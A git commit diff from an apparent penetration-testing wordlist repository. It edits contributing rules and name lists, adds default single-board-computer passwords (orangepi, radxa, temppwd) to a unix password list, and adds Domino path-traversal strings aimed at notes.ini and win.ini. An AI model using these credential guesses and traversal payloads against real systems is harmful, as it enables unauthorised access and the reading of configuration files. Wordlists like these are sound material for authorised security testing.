docs: Finish notice file, small changes to wordlists

2025-02-05 23:09:04 +01:00
parent 4eddf72515
commit 19978079bc
35 changed files with 746313 additions and 948800 deletions
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -31,7 +31,8 @@ Pull requests are the best way to propose changes. We actively welcome your pull
    - There must be **no** empty lines.
    - All wordlists are **lowercase** unless it makes sense, e.g. file names.
    - For wordlists for names, cities, countries, etc. **every word** must be capitalized. (e.g. **J**ohn **C**ena, not John **c**ena or **j**ohn **c**ena)
-3. Issue that pull request!
+3. Make sure to have the source of the wordlist in your pull request. If you made the wordlist yourself, please also mention it so that it is clear.
+4. Issue that pull request!

 ## Commit messages guidelines

--- a/NOTICE.md
+++ b/NOTICE.md
--- a/tools/make_readme.py
+++ b/tools/make_readme.py
@@ -27,6 +27,7 @@ keywords = {
    "Itunes": "iTunes",
    "Xml": "XML",
    "Xss": "XSS",
+    "Xxe": "XXE",
 }
 wordlists = {}

--- a/wordlists/languages/danish.txt
+++ b/wordlists/languages/danish.txt
--- a/wordlists/languages/dutch.txt
+++ b/wordlists/languages/dutch.txt
--- a/wordlists/languages/portuguese.txt
+++ b/wordlists/languages/portuguese.txt
--- a/wordlists/languages/ukrainian.txt
+++ b/wordlists/languages/ukrainian.txt
--- a/wordlists/names/top_male_names_usa.txt
+++ b/wordlists/names/top_male_names_usa.txt
@@ -11,7 +11,6 @@ Adrian
 Agustin
 Ahmad
 Ahmed
-Aiden
 Al
 Alan
 Albert
@@ -112,7 +111,6 @@ Brain
 Branden
 Brandon
 Brant
-Brayden
 Brendan
 Brent
 Brenton
@@ -479,7 +477,6 @@ Jamar
 Jame
 Jamel
 James
-Jameson
 Jamie
 Jan
 Jared
@@ -608,7 +605,6 @@ Leslie
 Lester
 Levi
 Lewis
-Liam
 Lincoln
 Lindsey
 Linwood
--- a/wordlists/passwords/bt4_passwords.txt
+++ b/wordlists/passwords/bt4_passwords.txt
@@ -1,4 +1,3 @@
-
 00000000
 0000000
 000000
--- a/wordlists/passwords/honeynet.txt
+++ b/wordlists/passwords/honeynet.txt
--- a/wordlists/passwords/password.txt
+++ b/wordlists/passwords/password.txt
--- a/wordlists/passwords/unix_passwords.txt
+++ b/wordlists/passwords/unix_passwords.txt
@@ -5,6 +5,7 @@
 74k&^*nh#$
 123abc
 123qwe
+1234
 010203
 11111
 012345
@@ -189,6 +190,7 @@ bestfriends
 bettyboop
 beyonce
 bhebhe
+bianbu
 bianca
 billabong
 birthday
@@ -334,6 +336,7 @@ darren
 david
 david1
 debbie
+debian
 december
 deedee
 delfin
@@ -585,6 +588,7 @@ lester
 letmein
 liliana
 lilmama
+linaro
 linda
 lindsay
 lindsey
@@ -620,6 +624,7 @@ loveu
 loveya
 loveyou
 loving
+luckfox
 lucky
 lucky1
 lucky7
@@ -685,6 +690,7 @@ midnight
 mierda
 miguel
 milagros
+milkv
 miller
 millie
 minnie
@@ -740,6 +746,7 @@ olivia
 omarion
 onelove
 orange
+orangepi
 orlando
 oscar
 paloma
@@ -806,6 +813,7 @@ qwerty1
 qwertyuiop
 rabbit
 rachel
+radxa
 rafael
 raiders
 rainbow
@@ -823,6 +831,7 @@ richard
 robbie
 robert
 roberto
+rock
 rodrigo
 ronald
 ronaldo
@@ -906,6 +915,7 @@ spongebob
 sporting
 sq!us3r
 stacey
+starfive
 starwars
 steaua
 stella
@@ -940,6 +950,7 @@ teamo
 teddybear
 teiubesc
 tekiero
+temppwd
 tennis
 tequiero
 teresa
@@ -969,6 +980,7 @@ tweety
 twilight
 twinkle
 tyler
+ubuntu
 undertaker
 united
 vagrant
--- a/wordlists/usernames/multiple_sources_users.txt
+++ b/wordlists/usernames/multiple_sources_users.txt
--- a/wordlists/vulnerabilities/apache.txt
+++ b/wordlists/vulnerabilities/apache.txt
--- a/wordlists/vulnerabilities/directory_traversal_win.txt
+++ b/wordlists/vulnerabilities/directory_traversal_win.txt
@@ -845,4 +845,3 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 \\\%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
 \\\%2e%2e%5c%2e%2e%5cboot.ini
 \\\%2e%2e%5cboot.ini
-../../../program%20files%20(x86)/hmailserver/bin/hmailserver.ini
--- a/wordlists/vulnerabilities/domino.txt
+++ b/wordlists/vulnerabilities/domino.txt
@@ -1,3 +1,6 @@
+852566C90012664F
+.nsf/../notes.ini
+.nsf/../winnt/win.ini
 ?Open 
 ?OpenServer
 AgentRunner.nsf
@@ -12,19 +15,14 @@ DEESAdmin.nsf
 a_domlog.nsf
 account.nsf
 accounts.nsf
-activity.nsf
-adm-bin/acls.exe
-adm-bin/alerts.exe
-adm-bin/console.exe
 adm-bin/listdb.exe
-adm-bin/webstats.exe
 admin4.nsf
 admin5.nsf
 admin.nsf
 adminadm0disk.nsf
 adminadm0plog.nsf
 agentrunner.nsf
-alog4.nsf
+agentrunner.nsf 
 alog.nsf
 archive/a_domlog.nsf
 archive/l_domlog.nsf
@@ -33,22 +31,21 @@ bookmark.nsf
 bookmarks.nsf
 books.nsf
 busytime.nsf
+busytime.nsf 
 calendar.nsf
 catalog.nsf
+catalog.nsf 
 cersvr.nsf
 certa.nsf
 certlog.nsf
 certsrv.nsf
-cgi-bin
-cgi-bin/StAdminAct.exe
-cgi-bin/xxxx
+certsrv.nsf 
 chatlog.nsf
 clbusy.nsf
 cldbdir.nsf
 clusta4.nsf
 collect4.nsf
 cpa.nsf
-cppfbws.nsf
 customerdata
 da.nsf
 database.nsf
@@ -56,13 +53,11 @@ db.nsf
 dba4.nsf
 dbdirman.nsf
 dclf.nsf
-ddm.nsf
+decsadm.nsf
 decsadm.nsf                                       
 decslog.nsf
 default.nsf
 deslog.nsf
-dfc
-dfc/dfc100.nsf
 diiop_ior.txt
 dirassist.nsf
 doc/dspug.nsf
@@ -74,10 +69,12 @@ domadmin.nsf
 domcfg.nsf
 domguide.nsf
 domlog.nsf
-dpicfg.nsf
+domlog.nsf 
+dspug.nsf
 dspug.nsf 
 event.nsf
 events4.nsf
+events4.nsf 
 events5.nsf
 events.nsf
 group.nsf
@@ -89,9 +86,6 @@ help/dols_help.nsf
 help/help5_admin.nsf
 help/help5_client.nsf
 help/help5_designer.nsf
-help/help8_admin.nsf
-help/help8_client.nsf
-help/help8_designer.nsf
 help/help65_admin.nsf
 help/help65_client.nsf
 help/help65_designer.nsf
@@ -103,15 +97,10 @@ help/readme.nsf
 helplt4.nsf
 hidden.nsf
 homepage.nsf
-iNotes
 iNotes/Forms5.nsf
 iNotes/Forms5.nsf/$DefaultNav
 iNotes/Forms6.nsf
-iNotes/Forms7.nsf
-iNotes/Forms8.nsf
 iNotes/help65_iwa_en.nsf
-iNotes/help70_iwa_en.nsf
-iNotes/help80_iwa_en.nsf
 iNotesForms5.nsf
 jotter.nsf
 l_domlog.nsf
@@ -121,13 +110,12 @@ leiadm.nsf
 leilog.nsf
 leivlt.nsf
 lndfr.nsf
-lndsutr.nsf
 log4a.nsf
 log.nsf
+log.nsf 
 loga4.nsf
 lsxlc.nsf
 mab.nsf
-mail
 mail1.box
 mail2.box
 mail3.box
@@ -139,31 +127,29 @@ mail8.box
 mail9.box
 mail10.box
 mail.box
-mail/NOMBRE_USUARIO.nsf
+mail.box 
 mail/admin.nsf
-mail/anotes.nsf
 mail/pxp.nsf
-mail/system.nsf
 mailw46.nsf
 msdwda.nsf
 mtatbls.nsf
 mtstore.nsf
-namagent.nsf
 names.nsf
-nntp
+names.nsf 
 nntp/nd000000.nsf
 nntp/nd000001.nsf
 nntp/nd000002.nsf
 nntp/nd000003.nsf
 nntp/nd000004.nsf
 nntppost.nsf
+nntppost.nsf 
 notes.nsf
 ntsync4.nsf
 ntsync45.nsf
+ntsync45.nsf 
 patrol41.nsf
 perweb.nsf
 private.nsf
-proghelp
 proghelp/KBCCV11.NSF
 proghelp/KBNV11.NSF
 proghelp/KBSSV11.NSF
@@ -171,30 +157,14 @@ public.nsf
 puserinfo.nsf
 qpadmin.nsf
 qstart.nsf
-quickplace
 quickplace/quickplace/main.nsf
-quickplace/quickplacemain.nsf
+quickplacequickplacemain.nsf
 quickstart/qstart50.nsf
 quickstart/wwsample.nsf
 readme.nsf
 reports.nsf
+reports.nsf 
 resource.nsf 
-sametime
-sametime/buildinfo.txt
-sametime/hostAddress.xml
-sametime/stadmin
-sametime/stadmin/LoggingError.jsp
-sametime/stadmin/LoggingMeetingDetails.jsp
-sametime/stadmin/LoggingViewSelection.jsp
-sametime/stadmin/LoggingViewTable.jsp
-sametime/stadmin/MonitoringViewGeneralServerStatus.jsp
-sametime/stadmin/MonitoringViewMeetingsAndParticipants.jsp
-sametime/stadmin/MonitoringViewOverview.jsp
-sametime/stadmin/MonitoringViewSelection.jsp
-sametime/stadmin/MonitoringViewToolsInMeetings.jsp
-sametime/stadmin/MonitoringViewTotalLogins.jsp
-sametime/stadmin/StatisticsViewSelection.jsp
-sample
 sample/faqw46.nsf
 sample/framew46.nsf
 sample/pagesw46.nsf
@@ -203,50 +173,14 @@ sample/site1w46.nsf
 sample/site2w46.nsf
 sample/site3w46.nsf
 schema50.nsf
+schema50.nsf 
 schema.nsf
 secret.nsf
-servlet/
-servlet/AccessControlServlet
-servlet/DominoAdminXPathRequestServletJAXP
-servlet/DominoBootstrapServlet
-servlet/DominoConfigurationServlet
-servlet/FileUploadServlet
-servlet/MMAPIServlet
-servlet/MeetingServlet
-servlet/NameChange
-servlet/NameChangeServlet
-servlet/NotesCalendarServlet
-servlet/Policy
-servlet/PolicyServlet
-servlet/RAPFileServlet
-servlet/RefreshServlet
-servlet/SametimeStartupServlet
-servlet/StatisticsServlet
-servlet/TelephonyServlet
-servlet/UserInfoServlet
-servlet/admin
-servlet/auth
-servlet/auth/NameChange
-servlet/auth/Policy
-servlet/auth/admin
-servlet/auth/fileupload
-servlet/auth/mmapi
-servlet/auth/rapfile
-servlet/auth/refresh
-servlet/auth/scs
-servlet/bootstrap
-servlet/fileupload
-servlet/meeting
-servlet/mmapi
-servlet/rapfile
-servlet/refresh
-servlet/scs
-servlet/statistics
-servlet/stcal
-servlet/ststartup
-servlet/telephony
+setup.nsf
 setup.nsf 
 setupweb.nsf
+setupweb.nsf 
+smbcfg.nsf
 smbcfg.nsf 
 smconf.nsf
 smency.nsf
@@ -264,28 +198,31 @@ smvlog.nsf
 software.nsf
 srvnam.htm 
 srvnam.nsf
-stadmin
 statauths.nsf
 statautht.nsf
 statmail.nsf
+statmail.nsf 
+statrep.nsf
 statrep.nsf 
 stauths.nsf
 stautht.nsf 
-stcenter.nsf
+stconf.nsf
 stconf.nsf 
 stconfig.nsf
-stcs.nsf
+stconfig.nsf 
+stdnaset.nsf
 stdnaset.nsf 
 stdomino.nsf
 stlog.nsf
-stnamechange.nsf
-stpolicy.nsf
+stlog.nsf 
 streg.nsf
 stsrc.nsf
+stsrc.nsf 
 test.nsf
 userreg.nsf
 users.nsf
 vpuserinfo.nsf 
 web.nsf
+web.nsf 
 webadmin.nsf
 welcome.nsf
--- a/wordlists/vulnerabilities/fatwire_pagen_ames.txt
+++ b/wordlists/vulnerabilities/fatwire_pagen_ames.txt
--- a/wordlists/vulnerabilities/front_pages.txt
+++ b/wordlists/vulnerabilities/front_pages.txt
--- a/wordlists/vulnerabilities/hyperion.txt
+++ b/wordlists/vulnerabilities/hyperion.txt
@@ -1,579 +0,0 @@
-/
-HFM/
-HFM/Administration
-HFM/Administration/ManageServersAndApplications.asp
-HFM/Administration/RunningTasks.asp
-HFM/Administration/ShowRunningTaskLog.asp
-HFM/Administration/TaskAudit.asp
-HFM/Administration/TaskAuditExport.asp
-HFM/Administration/TaskProgress.asp
-HFM/Administration/UsersOnSystem.asp
-HFM/Calcman
-HFM/Calcman/convxmltovbs.asp
-HFM/Central
-HFM/Central/Preferences
-HFM/Central/Preferences/DefaultUserPreferences.asp
-HFM/Central/Tasks
-HFM/Central/Tasks/DisplayServers.asp
-HFM/Central/Tasks/SelectApplication.asp
-HFM/Central/Util
-HFM/Central/Util/HFMCentralConstants.asp
-HFM/Central/Util/HTML.asp
-HFM/Central/Util/LaunchHFM.asp
-HFM/Central/Util/ManageApplication.asp
-HFM/Central/Util/VerifyUserOnApplication.asp
-HFM/Common
-HFM/Common/AdminUtility.asp
-HFM/Common/Alerts.asp
-HFM/Common/Async.asp
-HFM/Common/Bottom.asp
-HFM/Common/Calendar.asp
-HFM/Common/CalendarPopup.asp
-HFM/Common/ContextMenuSupport.asp
-HFM/Common/CookieConstants.asp
-HFM/Common/Core.asp
-HFM/Common/Document.Asp
-HFM/Common/Empty.html
-HFM/Common/ErrorDetails.asp
-HFM/Common/ErrorLog.asp
-HFM/Common/FDMIntegrationUtil.asp
-HFM/Common/FileAccess.asp
-HFM/Common/GeneralUI.asp
-HFM/Common/GlobalFunctions.asp
-HFM/Common/HorzNav.asp
-HFM/Common/HsvJSConstantsServer_Common.asp
-HFM/Common/InlineComponentSupport.asp
-HFM/Common/JSClientConstants.asp
-HFM/Common/LogonOpenApp.asp
-HFM/Common/Message.asp
-HFM/Common/MessageDisplayFunctions.asp
-HFM/Common/Metadata.asp
-HFM/Common/MsgBox.Asp
-HFM/Common/NumberStringsJavaScript.asp
-HFM/Common/POVFunctions.asp
-HFM/Common/PopupBanners.asp
-HFM/Common/ProcessManagementConstants.asp
-HFM/Common/ProdNav.asp
-HFM/Common/ReSubmitWithPost.asp
-HFM/Common/Redirect.asp
-HFM/Common/ResourceManager.xslt
-HFM/Common/Resources.xslt
-HFM/Common/RoleIdsToResourceIds.xslt
-HFM/Common/SecurityConstants.asp
-HFM/Common/SecurityOptions.asp
-HFM/Common/StringConstants.asp
-HFM/Common/TabFunctions.asp
-HFM/Common/TaskBoxUI.asp
-HFM/Common/UserPOV.asp
-HFM/Common/Utilities.asp
-HFM/Common/WrkspcFuncs.asp
-HFM/Common/XMLFunctions.asp
-HFM/Common/XMLMetadata.asp
-HFM/Common/XmlSsnState.asp
-HFM/ConsolTemplate
-HFM/ConsolTemplate/ConsolTemplate.asp
-HFM/ConsolTemplate/ProcessTreeConsolTemplate.asp
-HFM/CreateApp
-HFM/CreateApp/CreateApp.asp
-HFM/CreateApp/ProcessCreate.asp
-HFM/Data
-HFM/Data/AsyncPMAlert.asp
-HFM/Data/CellHistory.asp
-HFM/Data/DBManagementClearData.asp
-HFM/Data/DBManagementCopyData.asp
-HFM/Data/DBManagementDeleteInvalidRecords.asp
-HFM/Data/DBManagementObjects.asp
-HFM/Data/DataAudit.asp
-HFM/Data/DataAuditExport.asp
-HFM/Data/DataExplorerCellAdjustments.asp
-HFM/Data/DataExplorerCellInformation.asp
-HFM/Data/DataExplorerCellText.asp
-HFM/Data/DataExplorerGridDefPOVtoMbrSelPOV.xsl
-HFM/Data/DataExplorerGridDefUpgrade.asp
-HFM/Data/DataExplorerGridSettings.asp
-HFM/Data/DataExplorerLineItemDetail.asp
-HFM/Data/DataExplorerManageProcess.asp
-HFM/Data/DataExplorerMbrSel.asp
-HFM/Data/DataExplorerTransactions.asp
-HFM/Data/DataExplorerUnassignedGroups.asp
-HFM/Data/DataExplorerUserPOVSupport.asp
-HFM/Data/DataGridCalcEPU.asp
-HFM/Data/DisplayColumns.asp
-HFM/Data/EntityDetails.asp
-HFM/Data/ExploreData.asp
-HFM/Data/ExploreDataJava.asp
-HFM/Data/FormInstructions.asp
-HFM/Data/FormViewDef.asp
-HFM/Data/HsvJSConstantsServer_Data.asp
-HFM/Data/HsvJSConstantsServer_ProcFlow.asp
-HFM/Data/ImportWDEFFromExcel.asp
-HFM/Data/LineItems.asp
-HFM/Data/MultiPhaseOptions.asp
-HFM/Data/MultiPhaseProcessControlPanelColOptions.asp
-HFM/Data/MultiPhaseProcessControlPanelRowOptions.asp
-HFM/Data/OverlappedConsolidationInfo.asp
-HFM/Data/PhaseOptions.asp
-HFM/Data/PostToAuditIntersectionUrl.asp
-HFM/Data/ProcFlowHistory.asp
-HFM/Data/ProcFlowManagement.asp
-HFM/Data/ProcMgtCalcEPU.asp
-HFM/Data/ProcessControlEmail.xsl
-HFM/Data/ProcessControlMultiPanelFlowManagement.asp
-HFM/Data/ProcessControlPanel.asp
-HFM/Data/ProcessControlPanelCalcSummary.asp
-HFM/Data/ProcessControlPanelFlowManagement.asp
-HFM/Data/ProcessControlPanelMbrSel.asp
-HFM/Data/ProcessControlPanelMulti.asp
-HFM/Data/ProcessControlPanelMultiColOptions.asp
-HFM/Data/ProcessControlPanelMultiMbrSel.asp
-HFM/Data/ProcessControlPanelMultiRowOptions.asp
-HFM/Data/ProcessControlPanelOptions.asp
-HFM/Data/ProcessControlTask.asp
-HFM/Data/ProcessDocMgrSaveWebGrid.asp
-HFM/Data/ProcessEntityDetails.asp
-HFM/Data/ProcessImportWDEFFromExcel.asp
-HFM/Data/ProcessLineItems.asp
-HFM/Data/ProcessProcFlowManagement.asp
-HFM/Data/ProcessSummary.asp
-HFM/Data/ProcessSummaryColOptions.asp
-HFM/Data/ProcessSummaryRowOptions.asp
-HFM/Data/ProcessUserPreferences.asp
-HFM/Data/SubmissionPhase.asp
-HFM/Data/SubmissionPhaseMbrSel.asp
-HFM/Data/Transactions.asp
-HFM/Data/UserPreferences.asp
-HFM/Data/WDEFAddMember.asp
-HFM/Data/WDEFColScript.asp
-HFM/Data/WDEFConstants.asp
-HFM/Data/WdefInterface.asp
-HFM/Data/WebFormBuilder.asp
-HFM/Data/WebFormCellProp.asp
-HFM/Data/WebFormCellText.asp
-HFM/Data/WebFormClientScript.asp
-HFM/Data/WebFormGenerated.asp
-HFM/Data/WebFormLineItems.asp
-HFM/Data/WebFormProcessFDMLaunch.asp
-HFM/Data/XMLDataGrid.asp
-HFM/Data/wdef.xslt
-HFM/Data/wdefExcel.xslt
-HFM/Data/wdef_print.xslt
-HFM/DeleteApp
-HFM/DeleteApp/DeleteApp.asp
-HFM/DeleteApp/DisplayServers.asp
-HFM/DeleteApp/ProcessDelete.asp
-HFM/DocMgr
-HFM/DocMgr/AddToFavorites.asp
-HFM/DocMgr/AddToWorkspace.asp
-HFM/DocMgr/DeleteItems.asp
-HFM/DocMgr/DocMgr.asp
-HFM/DocMgr/DocMgrCommon.asp
-HFM/DocMgr/DocMgrConstants.asp
-HFM/DocMgr/DocMgrDownloadDoc.asp
-HFM/DocMgr/DocMgrSave2.asp
-HFM/DocMgr/DocMgrSave.asp
-HFM/DocMgr/DocMgrSaveGrid.asp
-HFM/DocMgr/DocMgrSaveProcess.asp
-HFM/DocMgr/DownloadItem.asp
-HFM/DocMgr/ExtractItems.asp
-HFM/DocMgr/Favorites.asp
-HFM/DocMgr/FavoritesInclude.asp
-HFM/DocMgr/Link.asp
-HFM/DocMgr/LoadFiles_Add.asp
-HFM/DocMgr/LoadFiles_Add_Process.asp
-HFM/DocMgr/LoadFiles_Process.asp
-HFM/DocMgr/NewFolder.asp
-HFM/DocMgr/NewFolder_Process.asp
-HFM/DocMgr/NewItem.asp
-HFM/DocMgr/OpenItem.asp
-HFM/DocMgr/OpenItemDirect.asp
-HFM/DocMgr/RelatedContent.asp
-HFM/DocMgr/RelatedContentXml.asp
-HFM/DocMgr/TaskList.asp
-HFM/Downloads
-HFM/Downloads/j2re-1_3_1_04-windows-i586-i.exe
-HFM/EIE
-HFM/EIE/AccountCS2HFM.xsl
-HFM/EIE/ApplicationCS2HFM.xsl
-HFM/EIE/CASRedirector.asp
-HFM/EIE/CESAgent.asp
-HFM/EIE/CESMbrSel.asp
-HFM/EIE/CESTask2HFMTask.xslt
-HFM/EIE/Configuration.xsd
-HFM/EIE/ConsolMethodsCS2HFM.xsl
-HFM/EIE/ConsolidationMethod.xsd
-HFM/EIE/Cube.xsd
-HFM/EIE/CurrencyCS2HFM.xsl
-HFM/EIE/CustomCS2HFM.xsl
-HFM/EIE/DataBrokerListener.asp
-HFM/EIE/Dimension4All.xslt
-HFM/EIE/Dimension.xsd
-HFM/EIE/EIEFunctions.asp
-HFM/EIE/EIEListener.asp
-HFM/EIE/EIERedirector.asp
-HFM/EIE/EIERegisterApplication.asp
-HFM/EIE/EntityCS2HFM.xsl
-HFM/EIE/GenericDimCS2HFM.xsl
-HFM/EIE/HFMOfficeProvider.xslt
-HFM/EIE/HfmAwbListener.asp
-HFM/EIE/HubProdNav.asp
-HFM/EIE/ICPCS2HFM.xsl
-HFM/EIE/ManageSmartview.asp
-HFM/EIE/ScenarioCS2HFM.xsl
-HFM/EIE/SmartViewProviderReg.asp
-HFM/EIE/ValueCS2HFM.xsl
-HFM/ExtendedAnalytics
-HFM/ExtendedAnalytics/ExtendedAnalytics.asp
-HFM/FileTransfer
-HFM/FileTransfer/DownloadFile.asp
-HFM/GlobalNav
-HFM/GlobalNav/DefaultGlobalNavContent.asp
-HFM/GlobalNav/GlobalNav.asp
-HFM/GlobalNav/GlobalNavContentSupport.asp
-HFM/GlobalNav/GlobalNavInlineComponents.asp
-HFM/GlobalNav/HFMStaticObjectList.xml
-HFM/GlobalNav/XMLObjectPalette.asp
-HFM/GlobalWorkspaceNav
-HFM/GlobalWorkspaceNav/DefaultGlobalNavContent.asp
-HFM/GlobalWorkspaceNav/GlobalNav.asp
-HFM/GlobalWorkspaceNav/GlobalNavContentSupport.asp
-HFM/GlobalWorkspaceNav/GlobalNavInlineComponents.asp
-HFM/GlobalWorkspaceNav/HFMStaticObjectList.xml
-HFM/GlobalWorkspaceNav/ProcessCloseApp.asp
-HFM/GlobalWorkspaceNav/UserAppPrefs.asp
-HFM/GlobalWorkspaceNav/UserPreferences.asp
-HFM/GlobalWorkspaceNav/XMLObjectPalette.asp
-HFM/GlobalWorkspaceNav/bpm
-HFM/GlobalWorkspaceNav/bpm/conf
-HFM/GlobalWorkspaceNav/bpm/conf/HfmConfig.xml
-HFM/GlobalWorkspaceNav/bpm/modules
-HFM/GlobalWorkspaceNav/bpm/modules/com
-HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion
-HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion/hfm
-HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion/hfm/web
-HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion/hfm/web/appcontainer
-HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion/hfm/web/appcontainer/Adf.asp
-HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion/hfm/web/prefs
-HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion/hfm/web/prefs/Adf.asp
-HFM/GlobalWorkspaceNav/bpm/resources
-HFM/GlobalWorkspaceNav/bpm/resources/da
-HFM/GlobalWorkspaceNav/bpm/resources/de
-HFM/GlobalWorkspaceNav/bpm/resources/en
-HFM/GlobalWorkspaceNav/bpm/resources/es
-HFM/GlobalWorkspaceNav/bpm/resources/fr
-HFM/GlobalWorkspaceNav/bpm/resources/it
-HFM/GlobalWorkspaceNav/bpm/resources/ja
-HFM/GlobalWorkspaceNav/bpm/resources/ko
-HFM/GlobalWorkspaceNav/bpm/resources/ru
-HFM/GlobalWorkspaceNav/bpm/resources/sv
-HFM/GlobalWorkspaceNav/bpm/resources/tr
-HFM/GlobalWorkspaceNav/bpm/resources/zh-CN
-HFM/GlobalWorkspaceNav/bpm/resources/zh-TW
-HFM/HFMOfficeProviderSetup
-HFM/HFMOfficeProviderSetup/HFMOfficeProviderSetup.msi
-HFM/HFMOfficeProviderSetup/LaunchHFMOfficeProviderSetup.vbs
-HFM/HFMOfficeProviderSetup/setup.exe
-HFM/Home
-HFM/Home/AboutHFM.asp
-HFM/Home/AdminHome.asp
-HFM/Home/CustomUI.asp
-HFM/Home/Home.asp
-HFM/Home/LaunchPage.asp
-HFM/Home/MakeDefault.asp
-HFM/Home/MakeDefaultConstants.asp
-HFM/Home/MakeDefaultFunctions.asp
-HFM/Home/NewHome.asp
-HFM/Home/ProductRedirect.asp
-HFM/Home/ProductWindow.asp
-HFM/Home/ReportForward.asp
-HFM/Home/ReportWindow.asp
-HFM/Home/Report_Error.asp
-HFM/Images
-HFM/Images/CROSS01.CUR
-HFM/Images/CROSS02.CUR
-HFM/Images/CROSS03.CUR
-HFM/Images/CROSS04.CUR
-HFM/Images/MAIL.BMP
-HFM/Images/bnr_about.bmp
-HFM/Images/btn_process_1.bmp
-HFM/Images/btn_process_2.bmp
-HFM/Images/btn_process_3.bmp
-HFM/Images/btn_process_4.bmp
-HFM/Images/btn_process_5.bmp
-HFM/Images/horznav_lev0_sel_pic_0.psd
-HFM/Images/journal1.bmp
-HFM/Images/journal2.bmp
-HFM/IntercompanyTransactions
-HFM/IntercompanyTransactions/AsyncIctAlert.asp
-HFM/IntercompanyTransactions/AutoMatch.asp
-HFM/IntercompanyTransactions/DrillDownTransactionReport.asp
-HFM/IntercompanyTransactions/ICAlertOptions.asp
-HFM/IntercompanyTransactions/ICMDrillDownTransactionReport.asp
-HFM/IntercompanyTransactions/ICMonitorDetail.asp
-HFM/IntercompanyTransactions/ICMonitorDetails.xsl
-HFM/IntercompanyTransactions/ICMonitorReport.asp
-HFM/IntercompanyTransactions/ICOpenClosePeriodStatus.asp
-HFM/IntercompanyTransactions/ICOpenClosePeriodStatus.xsl
-HFM/IntercompanyTransactions/ICReports.xsl
-HFM/IntercompanyTransactions/ICTReportProcessor.asp
-HFM/IntercompanyTransactions/ICTransActionStatus.asp
-HFM/IntercompanyTransactions/ICTransColumnFilter.xsl
-HFM/IntercompanyTransactions/ICTransMatchingReportGeneral.asp
-HFM/IntercompanyTransactions/ICTransactionSummary.asp
-HFM/IntercompanyTransactions/ICTransactionsColumnFilter.asp
-HFM/IntercompanyTransactions/ICTransactionsCommon.asp
-HFM/IntercompanyTransactions/LoadTransactions.xsl
-HFM/IntercompanyTransactions/LockUnlockEntities.asp
-HFM/IntercompanyTransactions/LockUnlockEntities.xsl
-HFM/IntercompanyTransactions/LockUnlockEntitiesStatus.asp
-HFM/IntercompanyTransactions/LockUnlockEntitiesStatus.xsl
-HFM/IntercompanyTransactions/ManageICPeriods.asp
-HFM/IntercompanyTransactions/ManageICPeriods.xsl
-HFM/IntercompanyTransactions/ManageReasonCodes.asp
-HFM/IntercompanyTransactions/ManageReasonCodes.xsl
-HFM/IntercompanyTransactions/ManualMatchStatus.asp
-HFM/IntercompanyTransactions/MonitorICTrans.xsl
-HFM/IntercompanyTransactions/MonitorICTransactions.asp
-HFM/IntercompanyTransactions/MultiICTReportProcessor.asp
-HFM/IntercompanyTransactions/NewEditICTransaction.asp
-HFM/IntercompanyTransactions/ProcessICTrans.xsl
-HFM/IntercompanyTransactions/ProcessICTransactions.asp
-HFM/IntercompanyTransactions/ProcessTransAction.xsl
-HFM/IntercompanyTransactions/ReportByAcct.asp
-HFM/IntercompanyTransactions/ReportByID.asp
-HFM/IntercompanyTransactions/ReportHeader.xsl
-HFM/IntercompanyTransactions/ReportSection.xsl
-HFM/IntercompanyTransactions/SetICReasonCodes.asp
-HFM/IntercompanyTransactions/UnmatchICTransactions.asp
-HFM/IntercompanyTransactions/UnmatchICTransactions.xsl
-HFM/IntercompanyTransactions/XslObjects.asp
-HFM/Java
-HFM/Java/classes
-HFM/Java/classes/HFMJavaWebComponents.jar
-HFM/Java/classes/xerces
-HFM/Java/classes/xerces/xercesImpl.jar
-HFM/Java/classes/xerces/xmlParserAPIs.jar
-HFM/Journals
-HFM/Journals/HFM_PrintSingleJournal.xsl
-HFM/Journals/HFM_PrintSingleTemplate.xsl
-HFM/Journals/JournalEntry.asp
-HFM/Journals/Journals2.asp
-HFM/Journals/JournalsAction.asp
-HFM/Journals/JournalsCommon.asp
-HFM/Journals/JournalsDefColumns.asp
-HFM/Journals/JournalsDefFilter.asp
-HFM/Journals/JournalsDefProperties.asp
-HFM/Journals/JournalsMain.asp
-HFM/Journals/JournalsNew.asp
-HFM/Journals/ManageGroups.asp
-HFM/Journals/ManagePeriods.asp
-HFM/Journals/OpenJournal.asp
-HFM/Journals/OpenTemplate.asp
-HFM/Journals/PrintSingleJournal.asp
-HFM/Journals/ProcessFilterGetEntity.asp
-HFM/Journals/ProcessJournalEntry.asp
-HFM/Journals/ProcessJournalsPOV.asp
-HFM/Journals/ProcessJournalsQueryDef.asp
-HFM/Journals/ProcessLIPOVJournals.asp
-HFM/Journals/ProcessManagePeriods.asp
-HFM/Journals/ProcessMbrSelClickMain.asp
-HFM/Journals/ProcessPOVForGeneration.asp
-HFM/Journals/ProcessTemplateEntry.asp
-HFM/Journals/QueryDef.asp
-HFM/Journals/TemplateEntry.asp
-HFM/Journals/TemplatesAction.asp
-HFM/Journals/TemplatesMain.asp
-HFM/Journals/TemplatesNew.asp
-HFM/LoadExtract
-HFM/LoadExtract/ExtractData.asp
-HFM/LoadExtract/ExtractJournals.asp
-HFM/LoadExtract/ExtractMemberLists.asp
-HFM/LoadExtract/ExtractMetaData.asp
-HFM/LoadExtract/ExtractRules.asp
-HFM/LoadExtract/ExtractSecurity.asp
-HFM/LoadExtract/ExtractTransactions.asp
-HFM/LoadExtract/HsvJSConstantsServer_LoadExtract.asp
-HFM/LoadExtract/LoadJournals.asp
-HFM/LoadExtract/LoadMemberLists.asp
-HFM/LoadExtract/LoadRules.asp
-HFM/LoadExtract/LoadSecurity.asp
-HFM/LoadExtract/LoadTransactions.asp
-HFM/LoadExtract/ProcessExtractJournals.asp
-HFM/LoadExtract/ProcessExtractMemberlists.asp
-HFM/LoadExtract/ProcessExtractMetaData.asp
-HFM/LoadExtract/ProcessExtractRules.asp
-HFM/LoadExtract/ProcessExtractSecurity.asp
-HFM/LoadExtract/ProcessJournalsExtractTree.asp
-HFM/LoadExtract/ProcessLoadData.asp
